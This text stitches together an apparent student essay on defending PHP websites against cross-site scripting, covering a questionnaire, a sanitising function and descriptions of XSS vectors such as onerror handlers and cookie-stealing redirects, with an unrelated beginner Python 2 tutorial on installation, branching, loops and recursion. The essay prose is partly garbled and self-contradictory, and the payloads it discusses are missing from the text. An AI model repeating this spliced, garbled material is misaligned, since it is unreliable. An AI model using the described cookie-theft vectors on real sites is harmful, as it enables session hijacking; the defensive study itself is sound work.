Question number 3 asks what CSS stands for. CSS is either Cascading Style Sheets or Cross Site Scripting. Based on the questionnaire provided, the expected results should be Cross site scripting. 27 people said Cross Site scripting where only 7 people said Cascading Style Sheets. It gives the possibility to see that the answers are valid and not randomly selected.
According to W3C (2013), CSS (Cascading Style Sheets) is used for a style sheet language, useful for describing the presentation semantics (the formatting and appearance) of a document coded in a markup language. Its most typical application is to style web pages coded in XHTML and HTML. However the language may also be used on just about any XML document, including plain XML, XUL and SVG.
CSS can be a style sheet language utilized for describing the presentation semantics (the style and formatting) of a document designed in a markup language. Its most common application is to style WebPages designed in HTML and XHTML, nevertheless the language may also be put on any type of XML document, including plain XML, SVG and XUL. Cross-site scripting (CSS or XSS) is a kind of computer security vulnerability typically seen in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability works extremely well by attackers to bypass access controls for example the same origin policy. Cross-site scripting performed on websites online landed roughly 84% of all security vulnerabilities documented by Symantec at the time of 2007.Their effect may cover anything from a petty nuisance with a significant security risk, depending on sensitivity with the data handled from the vulnerable site and also the nature from a security mitigation implemented with the site's owner.
Figure 13, (question number 4) is a dichotomous question which states if they experience XSS injections before. Again, the results were expected with 27 people said yes where only 6 people said No. 100% of Postgraduate people had experienced XSS injection before as well as the 95% of Undergraduate people experienced XSS in the past.
According to Figure 14, question number 5, see Appendix A, Figure 3, is asking to identify if there is any cross-site (XSS) injections. Webmasters who have sufficient knowledge about XSS are being asked to find if there is any difference between those two XSS injections. Analyzing the results of this particular question and according always to my repliers, most of them (26 people) said "No Just 2 different XSS injections" while 6 people said "Yes two different urls" and only 2 said "I do not know". Gladly, most of them have knowledge between XSS injections while the correct answer is "No (just 2 different XSS injections)". The first picture's XSS injections is: and the second picture's XSS injection is: printing out the stored cookie from the server. That website is vulnerable for academic purposes and research methodologies. Moreover on this type of question we are in a position to say that most of webmasters understand the structure of XSS injections while give us the possibility to continue to the next question number 6.
The problem analyzed in the current study shows the cross-site scripting attacks that can frequently be used from primary attackers to inject websites with every possible way. Figure 15, question number 6 represents stored cross-site scripting injection. Analyzing the results from a number of people, mostly web developers, will get very useful information which will be used to improve the particular defenses. 6a image data analysis represents the code effectiveness against XSS injection. 2 people rated the represented code with 1, 18 people rated 2, 8 people rated 3, 4 people rated 4 and only 1 person rated 5. The ratio is 1(low) to 5 (High). According to these results we acknowledge that web developers are aware of the code on Figure 5. The analysis of this code is to strip all tags except in effective to not trust this defense as much as the defense in number 6. This gives the opportunity to expand this related PHP code and improve it in order to help web developers to understand and defend their websites accordingly.
The results of question number 7, figure 16 were expected as the command strips all tags before posted.
Figure 16 represents numerous cross-site scripting injections which some of them are not correct syntaxes. According to figure 7, this is question will answer a variety of questions we may have in order to analyze web developers data. Web developers come across those codes in every day basis and they already know that even " ' " can be an issue. Moreover many people claim theirselves developers just by installing a website through one click installers i.e. Fantastico, Installatron or Softaculus. Are people aware of cross-site scripting? Can they defend their websites with their current knowledge? These and many others are the questions which will be approached and analysed for academic use.
A variety of answers are selected where the most selected is number 3 and number 4
Figure 17, question 8 states the most important step you recommend for securing a new web server. This question has 11 answers. According to the results below the most selected answer is all of the above (31). A massive and impressive result where webmasters are aware of the potential security issues of their web servers.
Recommendations of improving XSS defenses are stated on question 9 (table 3), where people can select more than 1 answer. The most selected answer is �contextual output encoding/escaping of string input� and �Safely validating untrusted HTML input� with 29 responses each. Disabling scripts was selected 26 times where cookie security 22 and emerging defensive technologies 19. The results are stated above:
The final question at figure 18, is a tricky question where asks from user �What can protect you 100% from XSS attack?�. There is nothing to protect you 100% for the reason that everyday new exploits are developed and implemented to websites. The results are stated below with positive outcomes.
To conclude, question 5 and 7 are based on the code on question number 6. Moreover, if the PHP source code won't be changed there is no way to defend any website. With this said, some procedures have to be placed and analyzed.
Based on question 6a) which had negative responses and the defense it's not trusted to the end user, the existing code is expanded and modified. (See Appendix A, Figure 1)
The code referenced on figure 2, is vulnerable for Cross site scripting injections. According to figure 2, $fp variable is set for adding the content into commentx.txt file. $string variable gets the content of the comments.txt file and outputs the content of it without any restrictions. As an example of what used for this document is: See Appendix A, figure 3 .The output of this code is showed on figure 3.
Moreover, to avoid those vulnerable injections, a number of techniques must be taken place and edit the code accordingly.
Thinking of how it can be improved is the easy part since the information stated above state an overview of cross-site scripting injections. Flow Chart on Figure 4 represents an example of the way PHP code it should be developed. A detailed example of this flow chart is stated below.
User browses a website and starts writing on the blog (text block). The comments written in the text block are stored in a text file i.e. comments.txt. The script automatically scans text for any executable unwanted tags i.e. etc. The if statements states if nothing has been found in the stored text file then it prints the content of comments.txt, if unwanted tags were found then it strips them out and posts the comments.
Firstly we have to consider that PHP's built-in functions usually do not react to a number of XSS attacks. Hence functions including filter_var,strip_tags, htmlentities,mysql_real_escape_string, htmlspecialchars, tend not to protect websites 100%. That said, a new defense (PHP code) must be developed with that in mind.
Moreover, we need to understand the use of str_replace, preg_replace and html_entity_decode and what they represents.
str_replace - Replace all incidents in the search string using the replacement string
preg_replace - Perform a regular expression search and replace
html_entity_decode - Convert all HTML entities on their practicable characters.
These variables and arrays belongs to xss_clean($xss) function. It searches through the input data, in this case comments.txt file, for the values listed for str_replace, preg_replace, html_entity_decode. See Appendix B, figure 7 line 4-7.
In addition, according to Appendix B, figure 7 line 8, the referenced PHP command removes any attributes starting with "on" or "xmlns". Examples of commands starting with "on" and "xmlns" are shown in Appendix C, Figure 6.
The code on Appendix B, figure 7 line 9-11, removes javascript: and vbscript: protocols from the input data.
The code on Appendix B, figure 7 line 12-14 only work in Internet Explorer browser.
Following, remove namespaced elements i.e xmlns="namespaceURI".
$xss = preg_replace('#</*\w+:\w[^>]*+>#i', '', $xss); See Appendix B, figure 7 line 15.
To continue the following code removes really unwanted tags. $old_data is set equal to $xss, which $xss will strip tags in preg_replace parenthesis.
While $old_data is not equal to $xss let that value pass and wait for the next input data. See Appendix B, figure 7 lines 16-23.
If statement is set to open comments.txt file and add the input in a new line. See Appendix B, figure 7 lines 27-32.
The very end code $string variable gets the content of comments.txt file and then prints out the content with the fuction xss_clean set before.
nl2br � Inserts HTML line breaks before all newlines inside a string. See Appendix B, figure 7 lines 38-40
The result of this function, modified code is shown on Figure 5.
The injection which is used for this example is the same we used on Figure 3 .
Appendix B, Figure 7 represents a number of XSS injections which can be used to test the improved PHP code provided on this report.
See table 1 for more details about XSS Injections before and after PHP code improvements.
For the current study the names of the internet browsers used for testings are Internet explorer version 10.0.9200.16521, Firefox version 19.0.2 and Chrome version 25.0.1364.172 m . In this document, for better understanding the purpose of each XSS injection the browser which has been used is Internet explorer version 10.0.9200.16521.
4.1 Experiment result of XSS injection used from my questionnaire.
Cross site injection onload (see table 1 #1) the "onload" keyword inside HTML stand for a event handler. It is particularly effective inside BODY tags and it is supported in all major internet browsers. Having said that, you will find instances where this strategy will fail, for example when the BODY onload event handler is formerly overloaded more aloft about the page before your vector shows up. The current XSS injection was referenced in my questionnaire, question number 7 �Select the correct(s) XSS syntax�. The referenced code is incorrect for the reason that a �;� and double quotes are missing. The corrected one should be which is also referenced on table 1 #14.
Onmouseover (see table 1 #2) By styling a vulnerable element the inline onmouseover event may be nearly as well as onload. With all the height CSS properties the chance of an individual hovering their mouse on the vulnerable element can be greatly increased. The current XSS injection on table 1 #2 is also incorrect and its missing an apostrophe (�). The corrected XSS injection is click me!
According to table 1 #3 XSS injection, the onerror event is executed if an error occurs while loading an external file. This example uses a none existence url which is loading cookies. The corrected XSS injection is
XSS attack referenced in table 1 #4 refers to case insensitive of XSS attack vector. A is a UTF-8 encoded string character of the letter �a�. All letter can be replaced with encoded characters. A list of Unicode and UTF-8 encoding characters can be found at
XSS using code encoding, script can be encoded in base64 and can be placed it in META tag. This way, we absolve alert() completely. More details about that method can be found in. These examples as well as some other can be found on a website called (See table 1 #5).
Window.location advert redirects all users who browse to the saved document.cookie on the server. In this case all users are able to see all cookies and steal sessions (See table 1 #6).
4.2 Experiment result of XSS injection used from other sources
The XSS injection presented on table 2 #1 is an XSS Locator. Inject this string, and often in which a script is vulnerable without special XSS vector requirements the word "XSS" will appear. Make use of this URL encoding calculator at "" to encode the entire string.
According to table 2 #2 XSS injection, which is also an onerror XSS injection, can be used to execute an event if an error, in this case /xssed/ popup if foo.png doesn�t exist on the webserver.
On XSS injection referenced on the table 2 #3 there is an open quote and bracket in order to close any open quotes already exists while the new injection is placed i.e. .
This XSS injection closes first any open tags (if any) and executes an alert of /xss/ popup window (see table 2 #4).
The XSS injection referenced on table 2 #5, closes first any open tags (if any) and executes an alert of /xss/ popup window.
The XSS Injection at table 2 #6 uses location.href redirection and document.cookie which can be used to read cookies with the help of JavaScript. If a web site uses cookies as session reconnaissance plane, attackers can impersonate users� requests by stealing a complete set of victim�s cookies.
popups a window named XSS with a reference to Javascript. This is the most common XSS injection used to attack vulnerable websites (see table 2 #7).
The onload occurrence responses when an object has become loaded. Onload is often used from the element to carry out a script when a web site has loaded completely all content (including script files, images, CSS files, etc.). This is a more complex injection as it uses body tag and quotes to popup a window named XSS2 (see table 2 #8).
Can be used to close any open tags and popup a window named 1. The onerror event is triggered if an error occurs while loading an external file (e.g. a document or even an image) (see table 2 #9).
As seen on table 2 #10 injection this is the same injection but with closed tags �>. As we can see at the screenshot table 2 #16 the vulnerable website injected and hided the post comment form and buttons.
the marquee tag is a non-standard HTML element which causes text to scroll up, down, left or right automatically. On this situation XSS is a scrolling text from right to left (see table 2 #11).
XSS injection at table 2 #12 refers to Cascading Style Sheet list-style-image property which can be used to replace the list item with an XSS JavaScript alert.
The website tested can be found at and. Vulnerable and defended websites respectively. All browsers which have been used are plug-in free.
As previously discussed, XSS attacks have begun to involve people�s knowledge in 2000. A group of people started then to develop XSS defenses with low success rate since technology is expanding and growing in enormous speed.
In this report, there are several phases discussed to develop a PHP code in order to defend websites from XSS injections. As a starting point, there are multiple consequences of XSS attacks which have been found through a comprehensive research. Although, an understanding of the types of XSS attacks is crucial in order to develop defenses against XSS injections. Through the questionnaire provided, results were gathered for analysis and development of XSS defenses. The main view of methodology is to represent XSS defenses to a test website and the differences between different browsers. XSS attacks used were gathered from different sources which can be found in reference list. A number of those XSS attacks were used in questionnaire for academic use and analysis to develop XSS defenses which can be used from web masters and web developers.
The survey based methodologies played a big role in analyzing the information gathered and creates a visual representation of how people react on certain circumstances. It also shows a knowledgeable group of people with different ages and certificates which gives the possibility to analyse it further by developing XSS defenses for future uses.
At this stage there were a number of objective which have to be identified and analysed. Firstly, define a definition of techniques to defend against cross-site scripting techniques.
5.1 Discussion and critical evaluation
This report states a way of how XSS can be defended with a developed PHP language code. The facts of XSS injections which has been discuss previously are that XSS injections are most likely to originate on very popular websites with high traffic such as blogs, chat rooms, wikis, social networking. It could also enable massive DDoS attacks by creating a web browser botnet. It can also send spam, damage data or defraud existing or potential customers. Last but not least, it doesn�t rely on operating systems or web browser vulnerabilities.
There are numerous XSS defenses which can be found while searching through the internet but each of them discuss a part of XSS injection and not how it can completely defended. At this document, sources have been gathered and discussed to finalize and developed a complete XSS injection which can be edited in later stage for your website standards.
The questionnaire which has been published and used for this purpose has enabled me to collect large amounts of information in short period of time. The information collected, was analysed in the methodology section while comparing the XSS injection before and after of the developed XSS defense.
This report can be used for anyone who is in need for XSS defenses. Furthermore, the knowledge of people who are not webmasters is limited which needs to be explored before start using the code referenced in the main report. Moreover, the report it is very straight forward with step by step how this code can be implemented on the test website.
Sources which were used are accurate as well as reliable. They include variety of information regarding XSS injections and have been used accordingly to produce this report and as well as the developing of new improved PHP code to protect websites against XSS attacks. There are number of publications from IBM, Washington University in St. Louis, ICS-CERT which are considered scholar and reliable sources. The information provided is logical and they are supported by evidence.
I have been very excited to produce this report of XSS defenses since I have developed several personal websites which one of them was injected and hacked through cookie session, so I took the chance to expand my knowledge and collect information for how to defend websites properly for future use.
5.2 Self Reflection
While studying on University of Wolverhampton, I have seen myself being motivated and flexible. In my opinion, IT Security (information technology) involves a variety of sub subjects which can be explored every day. The last decade securing of data and information online is given the opportunity to people to find a way to inject any kind of online applications in order to steal data and use them for their own goods. For this reason, I was motivated to explore the security of websites and how can be defended from any vulnerability online.
I began with the description of this topic and then explore how the particular XSS injections can be defended from a simple PHP code. I identified the elements used and referenced sources which have helped me to construct this XSS protection. Also, Appendices and tables have been used in order to show the differences of XSS injection before and after of developing PHP code to defend the test website.
If I could go back and had the chance to alter a report�s component that it might be the questionnaire. The questionnaire designed for this purpose could be effective and more specific on some areas helping me gather more information for evaluating. For example, I could add more images with XSS injections asking for differences and opinions and finally on question number 8 I should add fewer answers for better analysis.
Acknowledgements
I would like to thank my supervisor, Dr. Shufan Yang who helped me to follow the need of this project, by giving me some information and questions to ask myself in order to get the best results of this project. I am grateful for her contribution and guidance. | https://www.ukessays.com/essays/computer-science/a-mac-sub-layer-and-the-physical-computer-science-essay.php | CC-MAIN-2016-50 | refinedweb | 8,532 | 51.28 |
*
not a statement
mike hengst
Ranch Hand
Joined: Oct 19, 2002
Posts: 43
posted
Oct 24, 2002 20:58:00
0
Why is this statement not a good one.
public int instantiateStudents() { for(int i = 0;i < 2;++i) { Student[i] aStudent = new Student(); } }
the errors are
A:\Projects\SRC\JAVA192\Project3\GradePoint.java:60: not a statement
Student[i] aStudent = new Student();
^
A:\Projects\SRC\JAVA192\Project3\GradePoint.java:60: ';' expected
Student[i] aStudent = new Student();
Thank you Oh Lord<br />For the white blind light<br />A city rises from the sea<br />I had a splitting headache<br />from which the future's made<br />--morrisson
Dave Landers
Ranch Hand
Joined: Jul 24, 2002
Posts: 401
posted
Oct 24, 2002 21:20:00
0
The compiler is expecting something like:
Type
identifier
=
expression
;
and of course the result type of the expression has to be compatible with the Type.
You have:
Student[ i ] aStudent = new Student();
..(Type)....(Ident)..=....(Expr)...
Student[ i ] is not a valid type.
It might be a good way to reference the i'th element of an array named Student, but that doesn't work as a Type.
Now, Student[] without the
i
could be a valid type, as in "an array of Student objects", but that would not match the result of the expression "new Student()" which is of type Student.
I imagine what you want is to assign a new Student() to each element in array of Students.
So you should declare a new array of the desired size, as in:
Student[] theStudents = new Student[ SIZE ];
and then loop thru them and assign a new Student() to each of these, as in:
theStudents[ i ] = new Student();
OK?
[ October 24, 2002: Message edited by: Dave Landers ]
mike hengst
Ranch Hand
Joined: Oct 19, 2002
Posts: 43
posted
Oct 24, 2002 21:49:00
0
That was a good explanation, bout the best I've read of that idea. Here is my code so that you can see what I am trying to do. instantiateStudent is supposed to fill the Student array I have created at the top of the GradePoint class. I think there are a few other errors as well(maybe you could, or someone hel there). Anyways thanks for any time you spend on this. It is something that is due tomorrow night. Also I don't think that I want direct code but rather an explanation of what I have to do.
public class GradePoint { private static char[] VALIDGRADES = {'F','D','C','B','A'}; private static int[] POINTS = {0,1,2,3,4}; private boolean valid; Student[] students = new Student[2]; public void assignGrades() throws Exception { for(int x = 0;x < 2;++x) { instantiateStudents(); getStudentData(); } for(int x = 0;x < 2;++x) { displayGrades(); } } public double getStudentData() throws Exception { //missing return statement? char grade; double points; int index; for(int i = 0;i < 5;++i) { System.out.println("Please enter grade for student " + students[i].getStudentNumber()); grade = (char)System.in.read(); System.in.read(); System.in.read(); valid = false; for(int y = 0;y < 5;++y) { if(grade == VALIDGRADES[y]) { valid = true; index = i; } if(valid) { students[y].setGrade(index,grade); //variable not initialized? } else { --y; System.out.println("Invalid grade entered"); } } } } public void instantiateStudents() { for(int i = 0;i < 2;++i) { Student[i] = new Student(); } } public String displayGrades() { for(int i = 0;i < 2;++i) { System.out.println(students[i].toString()); } } }
Dave Landers
Ranch Hand
Joined: Jul 24, 2002
Posts: 401
posted
Oct 24, 2002 22:08:00
0
Just a few comments, based on my "visual compiler" ...
javav
?
public void assignGrades() throws Exception { for(int x = 0;x < 2;++x) { etc...
Think about what's happening here - do you really want to call each of these methods twice? I'm not exactly sure what you need to be doing (or so I'm going to claim
) so you need to figure it out.
public double getStudentData() throws Exception { //missing return statement?
Since you declared that this method returns a double, you had better make sure that happens, with a "return someDoubleValue;" statement. If you don't want to return something, then don't say that's what yer gonna do.
students[y].setGrade(index,grade); //variable not initialized?
The compiler does not look at how you use the code, but it does see that it is possible to call this method without having initialized the students array. Might think about rearranging things because of this. Sometimes, if you know better than the compiler, you can get around this message (like initialize the darn thing to some bogus value just to quiet the compiler). But these warnings are worth paying attention to because they usually mean something's amiss in the design/organization of the code.
Student[i] = new Student();
Ah here's that problem again, but a bit different. One more try and I bet you get it.
What's the name of the array you are assigning to? Is it "Student" or is that the name of the class? Hmmm...
mike hengst
Ranch Hand
Joined: Oct 19, 2002
Posts: 43
posted
Oct 25, 2002 14:49:00
0
Thanks for the help. I think I am very close. I better be I have to be done with by midnight.
I will post my code for you to digest when I have it complete. Everything compiles now but am having a slight array out of bounds issue. Again thanks.
I agree. Here's the link:
subject: not a statement
Similar Threads
Converting Chars to Strings
Why can student[x] be resolved?
displaying the number of times a page has ever been accessed
school computer won't compile my code
[JTable] Keep row color when sorting
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton | http://www.coderanch.com/t/392707/java/java/statement | CC-MAIN-2014-15 | refinedweb | 973 | 61.87 |
tutorial (Also could 2.6.
Other resources
- Python Home Page
- Python Documentation
- Python Tutorial for Programmers
- LaTeX, PDF, and Postscript, and Zip versions
See also chapter The End for some more comments.
Intro
First things first
So, you've never programmed before. As we go through this tutorial, I will attempt to teach you how to program. There really is only one way to learn to program. You must read code and write code (as computer programs are often called). I'm going to show you lots of code. You should type in code that I show you to see what happens. Play around with it and make changes. The worst that can happen is that it won't work. When I type in code it will be formatted like this:
##Python is easy to learn print "Hello, World!".
If the computer prints something out it will be formatted like this:
Hello, World!
(Note that printed text goes to your screen, and does not involve paper. Before computers had screens, the output of computer programs would be printed on paper.)
If you try this program out and you get a syntax error, check and see what version of python you have. If you have python 3.0, you should be using the Non-Programmer's Tutorial for Python 3.0. This article was made for Python 2.6
There will often be a mixture of the text you type (which is shown in bold) and the text the program prints to the screen, which would look like this:
Halt! Who Goes there? Josh You may pass, Josh
(Some of the tutorial has not been converted to this format. Since this is a wiki, you can convert it when you find it.)
I will also introduce you to the terminology of programming - for example, that programming is often referred to as coding. This will not only help you understand what programmers are talking about, but also help the learning process.
Now, on to more important things. In order to program in Python you need the Python software. If you don't already have the Python software go to and get the proper version for your platform. Download it, read the instructions and get it installed.
Installing Python
For Python programming you need a working Python installation and a text editor. Python comes with its own editor IDLE, which is quite nice and totally sufficient for the beginning. As you get more into programming, you will probably switch to some other editor like emacs, vi or another.
The Python download page is. The most recent version is 3.1, but any Python 2.x version since 2.2 will work for this tutorial. Be careful with the upcoming Python 3, though, as some major details will change and break this tutorial's examples. A version of this tutorial for Python 3 is at Non-Programmer's Tutorial for Python 3. There are various different installation files for different computer platforms available on the download site. Here are some specific instructions for the most common operating systems:
Linux, BSD and Unix users
You are probably lucky and Python is already installed on your machine. To test it type python on a command line. If you see something like that in the following section, you are set.
If you have to install Python, just use the operating system's package manager or go to the repository where your packages are available and get Python. Alternatively, you can compile Python from scratch after downloading the source code. If you get the source code make sure you compile in the Tk extension if you want to use IDLE.
Mac users
Starting from Mac OS X (Tiger), Python ships by default with the operating system, but you might want to update to the newer version (check the version by starting python in a command line terminal). Also IDLE (the Python editor) might be missing in the standard installation. If you want to (re-)install Python, have a look at the Mac page on the Python download site.
Windows users
Some computer manufacturers pre-install Python. To check if you already have it installed, open command prompt (cmd in run menu) or MS-DOS and type python. If it says "Bad command or file name" you will need to download the appropriate Windows installer (the normal one, if you do not have a 64-bit AMD or Intel chip). Start the installer by double-clicking it and follow the procedure. Python for windows can be downloaded from the official site of python
Interactive Mode
Go into IDLE (also called the Python GUI). You should see a window that has some text like this:
Python 2.5.1 (r251:54863, Apr 18 2007, 08:51:08) .1 >>> you need to play with new Python statements, go into interactive mode and try them out.
Creating and Running Programs
Go into IDLE if you are not already. In the menu at the top, select
File then
New Window. In the new window that appears, type the following:
print "Hello, World!"
Now save the program: select
File from the menu, then
Save. Save it as "
hello.py" (you can save it in any folder you want). Now that it is saved it can be run.
Next run the program by going to
Run then
Run Module (or if you have a older version of IDLE use
Edit then
Run script). This will output
Hello, World! on the
*Python Shell* window.
For a more in-depth introduction to IDLE, a longer tutorial with screenshots can be found at
Running Python Programs in Unix
If you are using Unix (such as Linux, Mac OSX, or BSD), if you make the program executable with
chmod, and have as the first line:
#!/usr/bin/env python2
you can run the python program with
./hello.py like any other command.
Note: In some computer environments, you need to write:
#!/usr/bin/env python
Example for Solaris:
#!/usr/bin/python
Program file names
It is very useful to stick to some rules regarding the file names of Python programs. Otherwise some things might go wrong unexpectedly. These don't matter as much for programs, but you can have weird problems if you don't follow them for module names (modules will be discussed later).
- Always save the program with the extension .py. Do not put another dot somewhere else in the file name.
- Only use standard characters for file names: letters, numbers, dash (-) and underscore (_).
- White space (" ") should not be used at all (e.g. use underscores instead).
- Do not use anything other than a letter (particularly no numbers!) at the beginning of a file name.
- Do not use "non-english" characters (such as ä, ö, ü, å or ß) in your file names, or, even better, do not use them at all when programming.
Using Python from the command line
If you don't want to use Python from the command line, you don't have to, just use IDLE. To get into interactive mode just type
python without any arguments. To run a program, create it with a text editor (Emacs has a good Python mode) and then run it with
python program_name.
Additionally, to use Python within Vim, you may want to visit Using vim as a Python IDE
Where to get help
At some point in your Python career you will probably get stuck and have no clue about how to solve the problem you are supposed to work on. This tutorial only covers the basics of Python programming, but there is a lot of further information available.
Python documentation
First of all, Python is very well documented. There might even be copies of these documents on your computer, which came with your Python installation: * The official Python Tutorial by Guido van Rossum is often a good starting point for general questions.
- For questions about standard modules (you will learn what this is later), the Python Library Reference is the place to look.
- If you really want to get to know something about the details of the language, the Python Reference Manual is comprehensive but quite complex for beginners.
Python user community
There are a lot of other Python users out there, and usually they are nice and willing to help you. This very active user community is organised mostly through mailing lists and a newsgroup:
- The tutor mailing list is for folks who want to ask questions regarding how to learn computer programming with the Python language.
- The python-help mailing list is python.org's help desk. You can ask a group of knowledgeable volunteers questions about all your Python problems.
- The Python newsgroup comp.lang.python (Google groups archive) is the place for general Python discussions, questions and the central meeting point of the community.
In order not to reinvent the wheel and discuss the same questions again and again, people will appreciate very much if you do a web search for a solution to your problem before contacting these lists!.
Talking to humans (and other intelligent beings)
Often in programming you are doing something complicated and may not in the future remember what you did. When this happens, the program should probably be commented. A comment is a note to you and other programmers explaining what is happening. For example:
# Not quite PI, but an incredible simulation print 22.0 / 7.0 # 355/113 is even more incredible rational approx to PI.0 / 7.0 # Well, just a good approximation
Examples
Count to 10
While loops.
Decisions
If statement
As always I believe I should start each chapter with a warm-up typing exercise, so here is a short program to compute the absolute value of a number:
n = input("Number? ") if n < 0: print "The absolute value of", n, "is", -n else: print "The absolute value of", n, "is", n
Here is the output from the two times that I ran this program:
Number? -34 The absolute value of -34 is 34
Number? 1 The absolute value of 1 is 1", n, "is", -n". Otherwise it runs the line "
print "The absolute value of", n, "is", n".
More formally Python looks at whether the expression
n < 0 is true or false. An
if statement is followed by an indented block of statements that are run when the expression is true. Optionally after the
if statement is an
else statement and another indented block of statements. This second block of statements is run if the expression is false.
There are a number of different tests that an expression can have. Here is a table of all of them:
Another feature of the
if command is the
elif statement. It stands for else if and means if the original
if statement is false but the
elif part is true, then do the
elif part. And if neither the
if or
elif expressions are true, then do what's in the
else block. Here's an example:. There can be more than one
elif expression, allowing multiple tests to be done in a single
if statement.
Examples
# This Program Demonstrates the use of the == operator # using numbers print 5 == 6 # Using variables x = 5 y = 8 print x == y
And the output
False False
High_low.py
# Plays the guessing game higher or lower # This should actually be something that is semi random like the # last digits of the time or something else, but that will have to # wait till a later chapter. (Extra Credit, modify it to be random # after the Modules chapter) number = print "The average was:", sum / count
Sample runs:
Enter 0 to exit the loop Enter a number: 3 Enter a number: 5 Enter a number: 0 The average was: 4.0
Enter 0 to exit the loop Enter a number: 1 Enter a number: 4 Enter a number: 3 Enter a number: 0 The average was: 2.66666666667
average2.py
# keeps asking for numbers until count numbers have been entered. # Prints the average value. sum = 0.0 print "This program will take several numbers then average them" count = input("How many numbers would you like to average: ") current_count = 0 while current_count < count: current_count = current_count + 1 print "Number", current_count number = input("Enter a number: ") sum = sum + number print "The average was:", sum / count
Sample runs:
This program will take several numbers then average them How many numbers would you like to average: 2 Number 1 Enter a number: 3 Number 2 Enter a number: 5 The average was: 4.0
This program will take several numbers then average them How many numbers would you like to average: 3 Number 1 Enter a number: 1 Number 2 Enter a number: 4 Number 3 Enter a number: 3 The average was: 2.66666666667
Exercises
- b > 0: elif: print("ok") print("Nope")()
Advanced Functions Example
Some people find this section useful, and some find it confusing. If you find it confusing you can skip it (or just look at the examples.) Now we will do a walk through for the following program:
def mult(a, b): if b == 0: return 0 rest = mult(a, b - 1) value = a + rest return value print "3 * 2 = ", mult(3, 2)
3 * 2 = 6
Basically this program creates a positive integer multiplication function (that is far slower than the built in multiplication function) and then demonstrates this function with a use of the function. This program demonstrates the use of recursion, that is a form of iteration (repetition) in which there is a function that repeatedly calls itself until an exit condition is satisfied. It uses repeated additions to give the same result as mutiplication: e.g. 3 + 3 (addition) gives the same result as 3 * 2 (multiplication).
RUN 1
- Question: What is the first thing the program does?
- Answer: The first thing done is the function mult is defined with all the lines except the last one.
def mult(a, b): if b == 0: return 0 rest = mult(a, b - 1) value = a + rest return value
- This creates a function that takes two parameters and returns a value when it is done. Later this function can be run.
- What happens next?
- The next line after the function,
print "3 * 2 = ", mult(3, 2)is run.
- And what does this do?
- It prints
3 * 2 =and the return value of
mult(3, 2)
- And what does
mult(3, 2)return?
- We need to do a walkthrough of the
multfunction to find out.
RUN 2
- What happens next?
- The variable
agets the value 3 assigned to it and the variable
bgets the value 2 assigned to it.
- And then?
- The line
if b == 0:is run. Since
bhas the value 2 this is false so the line
return 0is skipped.
- And what then?
- The line
rest = mult(a, b - 1)is run. This line sets the local variable
restto the value of
mult(a, b - 1). The value of
ais 3 and the value of
bis 2 so the function call is
mult(3,1)
- So what is the value of
mult(3, 1)?
- We will need to run the function
multwith the parameters 3 and 1.
def mult(3, 2): if b == 0: return 0 rest = mult(3, 2 - 1) rest = mult(3, 1) value = 3 + rest return value
RUN 3
- So what happens next?
- The local variables in the new run of the function are set so that
ahas the value 3 and
bhas the value 1. Since these are local values these do not affect the previous values of
aand
b.
- And then?
- Since
bhas the value 1 the if statement is false, so the next line becomes
rest = mult(a, b - 1).
- What does this line do?
- This line will assign the value of
mult(3, 0)to rest.
- So what is that value?
- We will have to run the function one more time to find that out. This time
ahas the value 3 and
bhas the value 0.
- So what happens next?
- The first line in the function to run is
if b == 0:.
bhas the value 0 so the next line to run is
return 0
- And what does the line
return 0do?
- This line returns the value 0 out of the function.
- So?
- So now we know that
mult(3, 0)has the value 0. Now we know what the line
rest = mult(a, b - 1)did since we have run the function
multwith the parameters 3 and 0. We have finished running
mult(3, 0)and are now back to running
mult(3, 1). The variable
restgets assigned the value 0.
- What line is run next?
- The line
value = a + restis run next. In this run of the function,
a = 3and
rest = 0so now
value = 3.
- What happens next?
- The line
return valueis run. This returns 3 from the function. This also exits from the run of the function
mult(3, 1). After
returnis called, we go back to running
mult(3, 2).
- Where were we in
mult(3, 2)?
- We had the variables
a = 3and
b = 2and were examining the line
rest = mult(a, b - 1).
- So what happens now?
- The variable
restget 3 assigned to it. The next line
value = a + restsets
valueto
3 + 3or 6.
- So now what happens?
- The next line runs, this returns 6 from the function. We are now back to running the line
print "3 * 2 = ", mult(3, 2)which can now print out the 6.
- What is happening overall?
- Basically we used two facts to calculate the multiple of the two numbers. The first is that any number times 0 is 0 (
x * 0 = 0). The second is that a number times another number is equal to the first number plus the first number times one less than the second number (
x * y = x + x * (y - 1)). So what happens is
3 * 2is first converted into
3 + 3 * 1. Then
3 * 1is converted into
3 + 3 * 0. Then we know that any number times 0 is 0 so
3 * 0is 0. Then we can calculate that
3 + 3 * 0is
3 + 0which is
3. Now we know what
3 * 1is so we can calculate that
3 + 3 * 1is
3 + 3which is
6.
This is how the whole thing works:
3 * 2 3 + 3 * 1 3 + 3 + 3 * 0 3 + 3 + 0 3 + 3 6
Should you still have problems with this example, look at the process backwards. What is the last step that happens? We can easily make out that the result of
mult(3, 0) is
0. Since
b is
0, the function
mult(3, 0) will return
0 and stop.
So what does the previous step do?
mult(3, 1) does not return
0 because
b is not
0. So the next lines are executed:
rest = mult (a, b - 1), which is
rest = mult (3, 0), which is
0 as we just worked out. So now the variable
rest is set to
0.
The next line adds the value of
rest to
a, and since
a is
3 and
rest is
0, the result is
3.
Now we know that the function
mult(3, 1) returns
3. But we want to know the result of
mult(3,2). Therefore, we need to jump back to the start of the program and execute it one more round:
mult(3, 2) sets
rest to the result of
mult(3, 1). We know from the last round that this result is
3. Then
value calculates as
a + rest, i. e.
3 + 3. Then the result of 3 * 2 is printed as 6.
The point of this example is that the function
mult(a, b) starts itself inside itself. It does this until
b reaches
0 and then calculates the result as explained above.
Recursion
Programming constructs of this kind are called recursive and probably the most intuitive definition of recursion is:
- Recursion
- If you still don't get it, see recursion.
These last two sections were recently written. If you have any comments, found any errors or think I need more/clearer explanations please email. I have been known in the past to make simple things incomprehensible. If the rest of the tutorial has made sense, but this section didn't, it is probably my fault and I would like to know. Thanks.
Examples
countdown.py
def count_down(n): print n if n > 0: return count_down(n-1) count_down(5)
Output:
5 4 3 2 1 0
Commented_mult.py
